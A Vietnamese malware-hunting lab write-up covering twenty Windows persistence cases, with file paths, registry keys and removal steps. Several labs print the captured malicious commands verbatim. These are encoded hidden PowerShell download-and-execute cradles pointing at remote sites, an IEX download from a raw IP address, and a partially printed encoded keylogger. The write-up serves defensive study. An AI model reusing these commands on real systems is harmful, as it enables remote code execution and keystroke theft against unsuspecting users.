Finding Threat (Lab 01 - 20)

Malware Analysis

Lab 01

Recon:

Mình sử dụng tool Autoruns để xem những file nào khởi động cùng Windows. Nhớ chạy bằng quyền quản trị để lấy được hết các thông tin

Ở đây mình thấy có 2 file bị báo đỏ (Not verified). Unikey thì có thể tạm bỏ qua, ngoài ra thì có một file shortcut trông có vẻ khá khả nghi. Chuột phải chọn Jump to image để di chuyển tới thư mục chứa file.

Chuột phải để xem Properties của shortcut này, mình thấy nó trỏ tới file system.exe trong folder này luôn

Máy ảo này có sẵn tool để lấy ra hash nên mình sẽ lấy ra SHA-256 của file system.exe để đưa vào VirusTotal xem sao.

Và ta thu được là một con Trojan

Sau thì mình cũng thử quét file Unikey nhưng nó chỉ là file bình thường (thật ra là bị 2 cái báo Trojan lận :v)

Kết luận:

Mã độc có đường dẫn là: C:\Users\hunter\AppData\Roaming\ELP84P\System.exe.

Kỹ thuật persistent: Ghi giá trị vào Registry HKCU\Software\Microsoft\Windows NT\Current Version\Windows\Load.

Cách gỡ mã độc: xóa giá trị trong registry và xóa folder mã độc đi.

Lab 02

Recon:

Ở lab này, ngoài các app như Skype, 7zip, Unikey, ... báo đỏ ra thì mình thấy có hai file này nữa

Khi kiểm tra file của WinDefend, mình thấy ngày tạo ra của nó có vẻ hơi xa so với các file cùng thư mục. Có thể nó đã bị chỉnh sửa để làm gì đó.

Vì vậy, mình sẽ lấy SHA-256 của nó và vứt lên VirusTotal

Và ta lại thu được một con Trojan

Kết luận:

Mã độc nằm trong đường dẫn:C:\Windows\SysWOW64\hidservs.dll.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\System\CurrentControlSet\Services

Cách gỡ mã độc: Xóa file trên và xóa giá trị trong registry đi.

Lab 03

Recon:

Đầu tiên mình nghi vấn file này là mã độc do giá trị đường dẫn của nó được viết thường (hacker tự viết?). Tuy nhiên thì không phải

Để ý file ảnh background.png, tại sao file ảnh lại cần autoruns nhỉ? Mình thử cho vào VirusTotal và đây là kết quả

Có vẻ là hacker đã sử dụng kĩ thuật nào đó để giấu file PE vào bức ảnh

Kết luận:

Mã độc nằm trong đường dẫn: C:\Users\hunter\AppData\Roaming\background.png.

Kỹ thuật persistent: Sử dụng Task Scheduler.

Cách gỡ mã độc: Xóa file background.png và gỡ giá trị trong Task Scheduler đi.

Lab 04

Recon:

Với bài này, các cảnh báo đỏ không còn là mã độc nữa. (Đã check từng cái)

Sau khi check một hồi, tới file này, mình thấy lệnh mà cmd.exe thực thi có vẻ khả nghi

Cụ thể, đây là đoạn mã được thực hiện (Jump to entry để lấy được thông tin trong Task Scheduler)

/C STARt /B powershell -NonInteractive -WindowStyle Hidden -e JABBAHUAagAwAHAAYgBtAD0AKAAnAE8AJwArACgAJwA2AGwAOQAnACsAJwAyAGYAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVABlAG0AcABcAFcATwBSAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAGUAYwBUAG8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAFUAcgBJAFQAYABZAHAAUgBPAFQAbwBDAE8AbAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAnACsAJwAxADIAJwArACgAJwAsACAAJwArACcAdAAnACsAJwBsAHMAMQAxACwAIAB0ACcAKQArACcAbABzACcAKQA7ACQATwBkAGQAeABxAGcAcAAgAD0AIAAoACcATwAxACcAKwAoACcAagAnACsAJwBwADAAagAnACkAKQA7ACQAUQBqAHkAXwBwAGkAagA9ACgAKAAnAFgAMwAnACsAJwA5AHMAJwApACsAKAAnADAAJwArACcAdgAyACcAKQApADsAJABIAGwAdAB0AGUAYwBjAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwB7ADAAfQB3ACcAKwAnAG8AcgBkAHsAMAAnACsAJwB9ADIAMAAnACsAJwAxADkAewAwACcAKwAnAH0AJwApACAAIAAtAGYAIABbAGMAaABhAFIAXQA5ADIAKQArACQATwBkAGQAeABxAGcAcAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAEYAMAA1AF8AawAzAGUAPQAoACcASwBiACcAKwAnAGMAJwArACgAJwBiACcAKwAnADEAOQBfACcAKQApADsAJABXAGsAZQB0ADEAcwA0AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAGUAbgB0ADsAJABTAG0AeQB0AHQAbAA3AD0AKAAoACcAaAAnACsAJwB0AHQAcABzADoAJwApACsAKAAnAC8ALwBkAGEAZAAnACsAJwBpAGUAcgAnACsAJwBvACcAKwAnAHEAdQBlAC4AYwBvAG0AJwApACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGEAJwArACgAJwBkAG0AaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAGQAJwArACcAZwAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAcwA6ACcAKwAnAC8ALwAnACkAKwAnAHMAJwArACgAJwB1AGwAJwArACcAcwBlACcAKQArACgAJwBsACcAKwAnAGUAJwArACcAawAnACsAJwBzAHAAcgBlAHMALgBjAG8AbQAvAGMAZwBpAC0AJwArACcAYgBpACcAKQArACgAJwBuAC8AJwArACcANgBsACcAKQArACcAMABuACcAKwAoACcAeQAnACsAJwBPAC8AKgBoAHQAJwArACcAdAAnACkAKwAoACcAcABzACcAKwAnADoALwAnACsAJwAvAG0AJwApACsAJwBhACcAKwAoACcAdQAnACsAJwBsAGEAbgAnACkAKwAoACcAYQByACcAKwAnAHUAJwApACsAKAAnAG0AJwArACcAaQBmAG8AdQBuAGQAJwArACcAYQB0AGkAbwBuACcAKwAnAC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AUgAnACsAJwB1AG0AaQBGACcAKwAnAG8AdQBuACcAKwAnAGQAYQAnACkAKwAoACcAdABpACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcALwBRADkAZQB0AEYAJwApACsAJwAvACoAJwArACgAJwBoAHQAdABwACcAKwAnAHMAJwApACsAKAAnADoALwAvAGsAZQBsACcAKwAnAGEAcwAuAHkAZQAnACsAJwBjAC4AJwApACsAKAAnAGMAJwArACcAbwAuAGkAZAAnACkAKwAoACcALwBzACcAKwAnAHIAJwApACsAJwBqAG4AJwArACgAJwBzAC8AQgAvACoAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwBjAGEAJwArACcAZQBzACcAKwAnAGEAJwArACcAcgBtAG8AJwApACsAJwB2AGkAJwArACcAbgBnACcAKwAnAC4AJwArACcAYwBvACcAKwAoACcAbQAnACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGMAbwBuAHQAZQBuAHQAJwArACcALwAnACkAKwAnADkAJwArACcAcwAvACcAKwAoACcAKgBoAHQAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AawBpACcAKwAnAG4AZQBwAHIAJwArACcAZQBtAGkAbgAnACsAJwBzACcAKQArACgAJwAuAGMAJwArACcAbAAvAHcAJwApACsAKAAnAHAAJwArACcALQBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwA2AHcAcgAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6AC8ALwAnACsAJwBkAG8AJwApACsAJwBsACcAKwAoACcAcABoACcAKwAnAGkAJwApACsAKAAnAG4AaQBuACcAKwAnAHMAaQBnACcAKwAnAGgAdAAnACsAJwAuACcAKwAnAGkAdAAvAHcAcAAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAJwApACsAJwBkACcAKwAnAGUAJwArACgAJwBzACcAKwAnAC8ATABWACcAKQArACcAZgAvACcAKQAuACIAUwBQAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABUAGcAeAB6ADIAYwA5AD0AKAAoACcASAAnACsAJwAyAG8AZgAnACkAKwAoACcANAAnACsAJwB4AGQAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABDAGcAYwB0AHQANgAxACAAaQBuACAAJABTAG0AeQB0AHQAbAA3ACkAewB0AHIAeQB7ACQAVwBrAGUAdAAxAHMANAAuACIAZABgAE8AVwBuAGwAYABvAGEARABgAEYAaQBMAEUAIgAoACQAQwBnAGMAdAB0ADYAMQAsACAAJABIAGwAdAB0AGUAYwBjACkAOwAkAFYAMgBhAHIAZgBrAGUAPQAoACcARAAnACsAKAAnAG8AdgAnACsAJwBuAGYAaABvACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEgAbAB0AHQAZQBjAGMAKQAuACIAbABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADkAOAA1ADAAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAoACQASABsAHQAdABlAGMAYwApADsAJABUADIANAAwAGMAaQBnAD0AKAAnAEkAJwArACgAJwB6ACcAKwAnAHUAbwAnACkAKwAoACcAMAAnACsAJwByADMAJwApACkAOwBiAHIAZQBhAGsAOwAkAFEAaQAwADgAdABiAHIAPQAoACgAJwBUAHUAJwArACcAbgAnACkAKwAnAHIAJwArACgAJwB1AG4AJwArACcAZAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwBuAGMAOABsAHMAMwA9ACgAJwBXAHEAJwArACgAJwA1AHcAdQByACcAKwAnAGcAJwApACkA

Để ý thì đoạn mã đằng sau có vẻ là encode dạng nào đó. Thử dùng CyberChef:

Hmmm, trông hơi lạ, cơ mà mình để ý nếu các kí tự NUL kia bị loại bỏ, có vẻ sẽ có gì đó.

Trông có vẻ đã dễ nhìn hơn khá nhiều, cơ mà có vẻ đây là một đoạn code bị obfuscate. Giờ là lúc sử dụng sức mạnh công nghệ. Mình sẽ sử dụng ChatGPT 4.0 để đọc đoạn code này

Từ kết quả trên, có thể kết luận được đây là mã độc của lab này. Kiểm tra thì đúng là có folder được tạo ra, và mã độc là temp nên không còn thấy ở đây nữa.

Kết luận:

Mã độc thực thi lệnh để tải file mã độc về chạy

Kỹ thuật persistent: Sử dụng Task Scheduler.

Cách gỡ mã độc: Gỡ task này khỏi Task Scheduler.

Lab 05:

Recon:

Với bài này, khi sử dụng Autoruns, mình thấy có một lệnh khả nghi

Thử search câu lệnh này trên GPT, mình ra được kết quả như sau:

Vậy nếu mình đoán không nhầm thì file OIS.EXE sẽ chứa Mimikatz. Sử dụng Jump to image để đến thư mục chứa file này và lấy hash cho vào VirusTotal

Và như dự đoán, đây là Mimikatz

Để ý kĩ hơn, OIS.EXE thật ra giống với một file trong Microsoft Office

Kết luận:

Mã độc nằm trong đường dẫn: C:\Windows\System32\OIS.EXE.

Kỹ thuật persistent: Sử dụng registry HKCU\Environment để tự động chạy Mimikatz với tham số sử dụng để dump user. Ngoài ra, sử dụng icon + tên giống của Microsoft Office để người dùng chủ quan.

Cách gỡ mã độc: Xóa giá trị UserInitMprLogonScript khỏi Registry trên, cũng như xóa file OIS.EXE đi.

Lab 06:

Recon:

Ở lab này, mình bắt đầu qua với máy ảo Windows 10 x64. Khi chạy Autoruns, mình thấy có một chương trình báo đỏ có Publisher không hiện gì ngoài Not verified

Chuyển tới thu mục chứa file thực thi, do lần này máy ảo không có sẵn tool để lấy mã hash nên mình sẽ sử dụng lệnh cmd certutil -hashfile để lấy mã hash của chương trình này và up lên VirusTotal

Và đây là kết quả VirusTotal thu được

Kết luận:

Mã độc nằm trong đường dẫn: C:\Windows\SysWOW64\trnsrun.exe.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SYSTEM\CurrentControlSet\Services\trnsrun.

Cách gỡ mã độc: Xóa file trnsrun.exe và giá trị trong Registry đi.

Lab 07:

Recon:

Sang lab tiếp theo, khi mở Autoruns, mình thấy luôn có một file DLL đáng ngờ

Thử lấy ra mã hash của file này và cho lên VirusTotal, mình thấy một con mã độc

Kết luận:

Mã độc nằm trong đường dẫn: C:\Users\Gee\AppData\Roaming\Microsoft\Windows\OUTLIB.DLL.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs.

Cách gỡ mã độc: Xóa file OUTLIB.DLL và giá trị trong registry.

Lab 08:

Recon:

Với lab này thì các file báo đỏ thì có vẻ không có file nào là mã độc cả.

Ở đây, để ý một lúc thì mình thấy ứng dụng McAfee có đường dẫn hơi khác so với các file còn lại (ProgramData so với ProgramFile).

Nhảy tới thư mục chứa file, mình không thấy gì cả??

Thử sử dụng cmd, mình thấy có khá nhiều file bị ẩn đi

Lấy ra hash của file McAfee.exe và up lên VirusTotal, mình ra được kết quả như sau:

Có vẻ nó chỉ dùng để làm gì đó. Thử với các file còn lại và đây là kết quả khi mình quét file McUtil.dll

Kết luận:

Mã độc nằm trong đường dẫn: C:\ProgramData\McAfee\McUtil.dll.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SYSTEM\CurrentControlSet\Services\McAfee

Cách gỡ mã độc: Xóa cả folder McAfee trên đi và xóa giá trị trong Registry.

Lab 09

Recon:

Với lab này, khi mình mới mở máy thấy có một cửa sổ Powershell được bật lên trong giây lát. Có vẻ khá đáng ngờ nên mình sẽ để ý tới Powershell trong Autoruns nhiều hơn.

Dễ có thể thấy nó thực thi một file đáng ngờ install.ps1 thông qua lệnh powershell.exe -ExecutionPolicy Bypass -file C:\ProgramData\Microsoft\install.ps1 -WindowStyle Hidden.

Mở thư mục C:\ProgramData\Microsoft\, mình thấy được file install.ps1

Đây là nội dung của file này

powershell -w hidden -enco JABFAGEAcQBlAGsAcQBkAHIAPQAnAFIAZABpAGgAeQBoAG8AawByACcAOwAkAFEAbABpAGQAcwB2AG0AZwB4ACAAPQAgACcANgA5ADcAJwA7ACQAWgBlAGsAcABpAHcAYQBmAGkAZwB5AHcAPQAnAEIAegBuAHAAaQBtAHMAZAB6AGgAegAnADsAJABEAHYAYgBhAHAAcgBlAHgAZwBtAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAbABpAGQAcwB2AG0AZwB4ACsAJwAuAGUAeABlACcAOwAkAE4AeQB2AGcAZQB1AG4AYQBtAHUAdgBpAD0AJwBRAHcAbABlAGwAbABpAGcAbwB4AGIAJwA7ACQATQBnAHUAZgBwAHYAYQBzAGsAaABsAHoAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AdwBFAEIAQwBsAGkAZQBuAHQAOwAkAFMAbgBvAHQAdQB6AGoAaQA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQByAGYAYQBqAGIAZAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AawB4ADQAMwAyADQAMwA0AC8AKgBoAHQAdABwAHMAOgAvAC8AaABlAGYAbwBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANQB6AHUAegA5AGkAcgAwADAANgAwADYALwAqAGgAdAB0AHAAOgAvAC8AaQBjAGwAbwB1AGQAZwByAGEAcABoAGkAYwBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbwAxAGMAdQA3ADYAMgA4AC8AKgBoAHQAdABwADoALwAvAGIAdQBjAGsAZQB0AGwAaQBzAHQAYQBkAHYAdABvAHUAcgBzAC4AYwBvAG0ALwBtADUAXwBlAGQAaQB0AF8AaQB0AGUAbQAvADAANgA2ADAANQBsAGQAMAAzADEAOQA3AC8AKgBoAHQAdABwADoALwAvAG4AYQBhAHYAaQBrAHMAYwBoAG8AbwBsAC4AYwBvAG0ALwBuAGEAYQB2AGkAawBzAGMAaABvAG8AbAAuAGMAbwBtAC8AbwBvAHEAdgBpADcAYQAwADYAOAAyAC8AJwAuACIAUwBQAEwAYABJAHQAIgAoACcAKgAnACkAOwAkAFoAdwBlAGMAcABsAGMAbQBoAG4AegB1AGMAPQAnAE8AZgByAGgAYgB2AGIAZwBvAGMAbwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBpAHgAZQBuAGYAaAB1AHYAeABsAG8AdwAgAGkAbgAgACQAUwBuAG8AdAB1AHoAagBpACkAewB0AHIAeQB7ACQATQBnAHUAZgBwAHYAYQBzAGsAaABsAHoALgAiAGQAYABPAHcATgBgAEwATwBhAGQAYABGAGkAbABFACIAKAAkAFMAaQB4AGUAbgBmAGgAdQB2AHgAbABvAHcALAAgACQARAB2AGIAYQBwAHIAZQB4AGcAbQBlACkAOwAkAEgAagB5AGUAdQB4AG8AZQBoAHIAPQAnAEYAZQBqAGoAbABrAGoAYwB0AHIAagBmAHQAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABEAHYAYgBhAHAAcgBlAHgAZwBtAGUAKQAuACIATABgAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIANgA0ADcANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAHIAVAAiACgAJABEAHYAYgBhAHAAcgBlAHgAZwBtAGUAKQA7ACQAUABxAGEAYgBiAHEAZgB4AHAAdgB6AGUAdQA9ACcATgBsAGsAdwByAHIAeABjAHIAJwA7AGIAcgBlAGEAawA7ACQAUwBwAGEAcwBrAG0AdwBxAG8APQAnAEUAdgBvAHoAbQB1AHEAbABlAGkAaABrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbQBqAGYAcgBvAGkAdwB0AHkAcAB3AD0AJwBNAGgAZQB3AHEAdwBoAHAAaABzACcA

Có vẻ lại là thực thi một đoạn mã bị mã hóa bằng Base64 như một lab trước. Sử dụng CyberChef, mình ra được đoạn code sau:

Giờ mình sẽ nhờ tới ChatGPT:

Tuy nhiên, có vẻ trang web sử dụng để tải mã độc về máy đã down nên không có gì được tải về cả

Kết luận:

Mã độc nằm trong đường dẫn: C:\Users\Gee\697.exe, được tải về và thực thi sử dụng file C:\ProgramData\Microsoft\install.ps1.

Kỹ thuật persitent: Ghi lệnh powershell vào Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell.

Cách gỡ mã độc: Xóa file install.ps1 và giá trị trong Registry. Nếu file 697.exe được tải về và khởi chạy thì sẽ phải xử lý triệt để hơn.

Lab 10

Recon:

Với bài này, khi sử dụng Autoruns, mình thấy có một lệnh chạy file dll khác hơn so với các lệnh chạy các file dll khác (không có config:)

rundll32.exe c:\windows\system32\config:conf.dll,inst

Mình thử vào folder C:\Windows\System32\config xem nhưng không tìm thấy file conf.dll. Thử hỏi ChatGPT, mình có như sau

Mình có thử sử dụng tool streams.exe nhưng không hiểu sao vẫn không tìm được file này. Tuy nhiên sau thì mình đã tìm ra cách là sử dụng dir /R.

Mình thử đọc file này thì vì là file dll nên khó mà biết như nào. Tuy nhiên, việc lấy ra hash của nó vẫn được thực thi thành công như bình thường

Up lên VirusTotal và mình có kết quả như sau:

Kết luận:

Mã độc nằm trong đường dẫn: C:\windows\system32\config:conf.dll.

Kỹ thuật persistent: Ghi lệnh powershell vào Registry HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vds.exe.

Cách gỡ mã độc: Xóa file mã độc và giá trị Registry đi. Lệnh xóa file mã độc:

Remove-Item -Path "C:\windows\system32\config:conf.dll"

Lab 11

Recon:

Ở bài này, khi mở Autoruns lên thì mình thấy có một dòng như này:

Tại sao sethc.exe lại trỏ tới cmd.exe nhỉ? Mình thử hỏi GPT

Mình cũng đã từng nghe về kỹ thuật này. Nó được sử dụng để truy cập vào hệ thống mà không cần phải đăng nhập. Khi đang ở màn hình khóa, mình chỉ cần ấn Shift 5 lần sẽ ra được như này

Kết luận:

Mã độc được thực hiện bằng cách trỏ cmd.exe vào sethc.exe.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe.

Cách gỡ mã độc: Xóa giá trị trong Registry đi.

Lab 12

Recon:

Khi đang tiến hành login thì mình thấy có một thông báo như sau. Không biết có liên quan gì tới mã độc không.

Khi mở Autoruns, mình để ý có dll được xuất hiện ở ảnh trên luôn. Trông có vẻ khá mờ ám

Mình thử lấy ra hash và up lên VirusTotal thì lại không có gì

Tuy nhiên, khi mình tra npilium.dll trên Google thì mình có tra được tài liệu sau:

2MB
microsoft-network-provider-exploit_117.pdf
pdf

Cụ thể, dựa trên tài liệu, ta biết được như sau

Có thể nói nó chính là mã độc của bài này

Kết luận:

Mã độc nằm ở đường dẫn: C:\Windows\System32\NPIlium.dll.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order.

Cách gỡ mã độc: Xóa file NPIlium.dll và giá trị trong Registry đi.

Lab 13

Recon:

Bài này thì sau khi ngồi soi khá lâu thì mình mới thấy được file này có vẻ khả nghi

Bởi đây là khi mình hỏi GPT

Tuy nhiên khi mình lấy hash và up lên VirusTotal thì lại không có tí virus nào

Các thông tin cũng có vẻ đúng

Cơ mà nếu thế thì mình không thấy chương trình nào khả nghi cả @@. Vậy là mình đã thử phân tích động file này sử dụng ProcMon.

Đấy là mình nói thế chứ cái máy ảo này không chạy nổi cả ProcMon :( . Vì vậy, mình đã sử dụng chính VirusTotal. Ở tab Behavior, mình thấy có các module sau được load khi chương trình khởi động

Để ý các dll khác ngoài tmdbglog.dll đều là các dll hệ thống quen thuộc. Khả năng cao dll này có thể là mã độc. Mình thử tìm file này trên máy ảo

Đường dẫn của nó nằm trong cùng với thư mục chứa file lsm.exe luôn. Thử lấy ra hash và đưa lên VirusTotal

Kết luận:

Mã độc nằm trong đường dẫn: C:\Program Files\PRTG Network Monitor\TmDbgLog.dll.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PRTG để chạy file lsm.exe có thực hiện load dll trên.

Cách gỡ mã độc: Xóa file TmDbgLog.dll và giá trị trong registry đi.

Lab 14

Recon:

Với bài này thì khi mở Autoruns, mình thấy có chương trình tên là Windows HD Audio Manager, tuy nhiên nó lại có logo của McAfee. Thậm chí đường dẫn cũng có vẻ đáng ngờ khi được lưu trong C:\Windows.

Trông khá lạ nên mình thử lấy hash ra và cho lên VirusTotal

Hmmm, file này đúng là của McAfee, nhưng sao đường dẫn lại như vậy được nhỉ. Có thể nó lại liên quan tới một file khác. Áp dụng các lab trước, hầu hết file mã độc sẽ cùng thư mục luôn. Ở đây mình để ý có một file đều có đầu là Qc cùng với đó là ngày tháng tạo ra cũng giống nhau

Mình thử up hash file này lên VirusTotal và thu được như sau

Update: Hình như đây là mã độc của APT-41.

Kết luận:

Mã độc nằm trong đường dẫn: C:\Windows\QcLite.dll.

Kỹ thuật persistent: Ghi giá trị vào registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

Cách gỡ mã độc: Xóa cả 2 file QcLite.dllQcConsol.exe đi, cũng như giá trị trong registry.

Lab 15

Recon:

Vừa vào Autoruns thì mình thấy ngay có một lệnh powershell khả nghi

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://39.109.114.56:80/a'))

Cách đoạn script hoạt động

Do link đã không còn hoạt động nên không thể phân tích gì thêm.

Kết luận:

Mã độc được thực thi dựa trên lệnh Powershell

Kỹ thuật persistent: Thêm entry vào WMI Database Entries.

Cách gỡ mã độc: Xóa entry trên đi.

Lab 16

Recon:

Với lab này, vừa mở Autoruns mình đã thấy một file thực thi đáng ngờ do DescriptionPublisher của nó trông khá hỗn độn

Lấy ra hash của nó sử dụng certutil, và đưa lên VirusTotal

Kết quả thu được

Kết luận:

Mã độc nằm ở đường dẫn: C:\Users\Public\RegAsm.exe.

Kỹ thuật persistent: Thêm task vào Task Scheduler.

Cách gỡ mã độc: Xóa file RegAsm.exe và gỡ task trong Task Scheduler đi.

Lab 17

Recon:

Đầu tiên, đập vào mắt mình khi mở Autoruns là giá trị 30000 trong Registry như sau:

Tuy nhiên, có vẻ nó không có gì đáng lo ngại, thêm nữa là file runonce.exe còn có vẻ không tồn tại.

Sau khi kéo xuống xem một hồi, mình thấy có sự xuất hiện của Mimikatz

Đến đây thì chắc chắn đây là mã độc rồi. Check hash lần nữa cho chắc

Kết luận:

Mã độc nằm trong C:\Windows\System32\mimilib.dll.

Kỹ thuật persistent: Ghi giá trị vào Registry HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages\mimilib.

Cách gỡ mã độc: Xóa tất cả file liên quan tới Mimikatz trong System32 và xóa giá trị Registry.

Lab 18

Recon:

Ở lab này, nhìn qua thì có vẻ không có gì. Mình đã phải check từng file một, hỏi GPT các thứ. Cho tới khi mình tìm tới file này của NVIDIA.

Kết quả khi hỏi GPT

Mình thử tra nvsmart.exe và ra được khá nhiều các kết quả liên quan tới malware, cụ thể là các từ khóa như PlugX, DLL Sideloading, …

Ở trang này, mình có đọc được như sau:

Vậy nghĩa là mã độc sẽ nằm trong file NvSmartMax.dll. Mình dễ dàng tìm thấy file này ở trong thư mục chứa nvsmart.exe luôn

Lấy ra mã hash và đưa lên VirusTotal

Kết quả thu được:

Theo như mình tìm hiểu được thì đây kiểu một con Backdoor.Trojan. Nó sẽ ghi lại keystroke, gửi thông tin hệ thống về phía attacker và khiến hệ thống có thể bị điều khiển từ xa

Kết luận:

Mã độc nằm ở đường dẫn: C:\Windows\apppatch\NvSmartMax.dll

Kỹ thuật persistent: Được sideload sử dụng NvSmart.exe được tự động khởi động thông qua Task Scheduler

Cách gỡ mã độc: Tắt tiến trình NvSmart.exe đang chạy rồi xóa các file NvSmartMax.dll, NvSmart.exenvsmart.sys khỏi hệ thống. Xóa task khỏi Task Scheduler.

Lab 19

Recon:

Ở lab này thì vừa mở máy lên mình thấy có cửa số Powershell. Sử dụng Autoruns để check:

Tuy nhiên, lạ cái là không có dòng nào có PowerShell cả. Vậy thì mình cứ tìm xem có cái nào đáng ngờ không vậy. Và ở đây mình thấy có một task trong TaskScheduler hiện là hidden

Thử mở task này trong Task Scheduler, mình đã thấy được câu lệnh có liên quan tới PowerShell

powershell -windowstyle hidden -EncodedCommand IwByAGUAcQB1AGkAcgBlAHMAIAAtAFYAZQByAHMAaQBvAG4AIAAyAAoAZgB1AG4AYwB0AGkAbwBuACAAUwB0AGEAcgB0AC0ASwBlAHkATABvAGcAZwBlAHIAKAAkAFAAYQB0AGgAPQAiACQAZQBuAHYAOgB0AGUAbQBwAFwAbABvAGcAZgBpAGwAZQAuAHQAeAB0ACIAKQAgAAoAewAKACAAIAAjACAAUwBpAGcAbgBhAHQAdQByAGUAcwAgAGYAbwByACAAQQBQAEkAIABDAGEAbABsAHMACgAgACAAJABzAGkAZwBuAGEAdAB1AHIAZQBzACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACwAIABFAHgAYQBjAHQAUwBwAGUAbABsAGkAbgBnAD0AdAByAHUAZQApAF0AIAAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHMAaABvAHIAdAAgAEcAZQB0AEEAcwB5AG4AYwBLAGUAeQBTAHQAYQB0AGUAKABpAG4AdAAgAHYAaQByAHQAdQBhAGwASwBlAHkAQwBvAGQAZQApADsAIAAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGIAeQB0AGUAWwBdACAAawBlAHkAcwB0AGEAdABlACkAOwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAHUAaQBuAHQAIAB1AEMAbwBkAGUALAAgAGkAbgB0ACAAdQBNAGEAcABUAHkAcABlACkAOwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUAKAB1AGkAbgB0ACAAdwBWAGkAcgB0AEsAZQB5ACwAIAB1AGkAbgB0ACAAdwBTAGMAYQBuAEMAbwBkAGUALAAgAGIAeQB0AGUAWwBdACAAbABwAGsAZQB5AHMAdABhAHQAZQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGk